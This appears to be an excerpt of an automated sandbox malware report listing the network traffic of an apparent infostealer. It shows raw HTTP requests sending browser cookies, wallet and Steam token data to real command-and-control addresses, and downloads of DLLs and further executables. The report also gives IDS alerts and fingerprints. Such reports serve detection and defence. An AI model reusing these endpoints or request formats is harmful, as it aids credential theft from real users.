0a Data Ascii: ------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="message"plugins------JEGHJDGIJECGDHJJECGH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDAFBKFIECBGCAKECGHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 2d 2d 0d 0a Data Ascii: ------GIJDAFBKFIECBGCAKECGContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------GIJDAFBKFIECBGCAKECGContent-Disposition: form-data; name="message"fplugins------GIJDAFBKFIECBGCAKECG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJECHost: 185.215.113.206Content-Length: 6679Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJDAKEGDBFHCAAKJJJDHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 2d 2d 0d 0a Data Ascii: ------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------DHJDAKEGDBFHCAAKJJJD--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJECFIECBGDGCAAAEHIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 2d 2d 0d 0a Data Ascii: ------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="file"------JJJECFIECBGDGCAAAEHI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJEHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="file"------JDHCBAEHJJJKKFIDGHJE--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEGHJJDGHCAKEBGIJKJHost: 185.215.113.206Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFCAAAAFBAKEBFBAKKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 2d 2d 0d 0a Data Ascii: ------CFCFCAAAAFBAKEBFBAKKContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------CFCFCAAAAFBAKEBFBAKKContent-Disposition: form-data; name="message"wallets------CFCFCAAAAFBAKEBFBAKK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEGHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 2d 2d 0d 0a Data Ascii: ------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="message"files------KFIDAFBFBKFHJJKEHIEG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJKHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 2d 2d 0d 0a Data Ascii: ------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="file"------KEGIDHJKKJDGCBGCGIJK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJDBAEHIJKJKEBFIEGHHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 2d 2d 0d 0a Data Ascii: ------IJJDBAEHIJKJKEBFIEGHContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------IJJDBAEHIJKJKEBFIEGHContent-Disposition: form-data; name="message"ybncbhylepme------IJJDBAEHIJKJKEBFIEGH--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGIDGDGHCAAAAKKFCGHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 37 64 62 36 62 35 36 34 33 35 30 61 34 37 64 65 30 65 65 30 63 35 32 39 35 36 37 63 38 30 35 66 32 61 35 37 33 63 38 35 65 66 34 32 33 31 37 37 62 36 30 31 39 34 32 36 32 34 32 32 66 38 64 37 32 37 63 66 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 2d 2d 0d 0a Data Ascii: ------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="token"627db6b564350a47de0ee0c529567c805f2a573c85ef423177b60194262422f8d727cf88------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JKEGIDGDGHCAAAAKKFCG--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 35 32 37 37 33 42 32 35 43 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB52773B25C82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49735 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49737 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49742 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49743 -> 172.67.165.166:443

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49736 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB6CC60 PR_Recv,

0_2_6CB6CC60

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
